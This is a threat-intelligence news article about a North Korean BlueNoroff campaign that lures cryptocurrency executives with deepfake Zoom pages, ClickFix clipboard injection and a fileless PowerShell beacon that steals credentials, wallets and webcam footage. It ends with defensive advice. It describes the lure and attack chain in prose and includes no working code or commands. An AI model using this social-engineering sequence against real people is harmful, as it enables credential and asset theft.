A sophisticated new cyberattack campaign attributed to BlueNoroff, a financially motivated subgroup of North Korea’s Lazarus Group, is actively targeting cryptocurrency and Web3 professionals using AI-generated deepfake Zoom interfaces, fileless PowerShell execution, and a self-reinforcing fake identity pipeline. The campaign has spread across more than 20 countries, with the United States accounting for 41% of all identified victims. CEOs and founders represent 45% of targets, reflecting BlueNoroff’s laser focus on individuals with direct access to digital asset holdings.
The Attack Chain: From Fake Zoom Link to Full Compromise
The campaign begins with attackers posing as investors, business partners, or conference organizers and approaching targets through LinkedIn, Telegram, or email. After establishing rapport, they invite the target to a Google Meet call. At the moment the victim confirms the meeting, the attacker quietly replaces the Google Meet link with a typo-squatted Zoom URL designed to look nearly identical to the real thing.
When the victim clicks the fake link, their browser loads a self-contained HTML page that mimics the Zoom meeting interface with remarkable fidelity — complete with fake participant video tiles, looping footage, and a simulated loading screen. Crucially, the page displays a fake technical error message claiming the victim’s microphone or camera drivers need to be reinstalled.
ClickFix Clipboard Injection: The Hidden Payload
This is where the ClickFix-style clipboard injection technique activates. The victim sees what appear to be harmless diagnostic commands and is instructed to copy and paste them into the Windows Run dialog or terminal. What they do not realize is that the page silently replaces the clipboard content with a hidden PowerShell execution command the moment they attempt to copy it.
The injected PowerShell command downloads an obfuscated second-stage script from the attacker’s command-and-control server and saves it to the user’s Temp folder as a file named chromechip.ps1. That script runs in a hidden window, installing a persistent C2 beacon that operates entirely in memory — leaving no traditional on-disk malware artifacts for endpoint detection tools to find. The beacon contacts the attacker’s server every five seconds and collects:
- Hostname, OS version, and running processes
- Administrative privilege status
- Timezone data and system locale
- Browser-stored credentials, saved passwords, and session cookies
- Telegram session data and cryptocurrency wallet credentials
- Live webcam footage transmitted continuously to attacker infrastructure
Researchers found that the full attack chain — from the initial click to complete system compromise — finished in under five minutes. Forensic analysis of one confirmed victim confirmed that the attacker maintained persistent access for 66 days before detection.
AI-Generated Deepfake Pipeline
What makes this campaign especially dangerous is its self-reinforcing deepfake production mechanism. Analysts uncovered more than 950 files on the attacker’s hosting server, including AI-generated profile photographs, fabricated LinkedIn profiles, and synthetic video recordings of fake executives used as Zoom participants. Each successful attack feeds raw material — real webcam footage of victims — into the next campaign, making future fake meetings increasingly convincing and harder to distinguish from real video calls.
Who Is Being Targeted
BlueNoroff has historically focused its financial theft operations on cryptocurrency exchanges, DeFi protocols, and blockchain developers. This campaign represents an evolution toward targeting the decision-makers and founders of Web3 companies directly, bypassing technical defenses by exploiting human trust and social engineering rather than software vulnerabilities. The geographic spread — more than 20 countries — suggests a systematic, intelligence-driven targeting operation rather than opportunistic attacks.
Defensive Recommendations
Organizations in Web3, cryptocurrency, and financial services should implement the following protections immediately:
- Verify all meeting links through a secondary communication channel before joining any call from a new contact
- Never run terminal commands, PowerShell scripts, or Run dialog entries provided by a website, regardless of how the instruction is framed
- Rotate all browser-stored passwords, API keys, and cryptocurrency wallet credentials if any suspicious meeting links were clicked
- Enable application allowlisting to prevent execution of unauthorized PowerShell scripts
- Deploy memory-based endpoint detection capable of identifying fileless malware and in-memory beacons
- Train staff to recognize ClickFix-style social engineering — legitimate platforms never ask users to run terminal commands to resolve audio or camera issues
This campaign demonstrates that North Korea’s cyber operations continue to advance in technical sophistication, combining AI-generated content, fileless execution, and deep social engineering into a highly effective financial theft pipeline. The combination of a zero-disk-footprint implant and a deepfake video lure represents a genuinely difficult-to-defend attack surface that goes well beyond conventional phishing awareness training.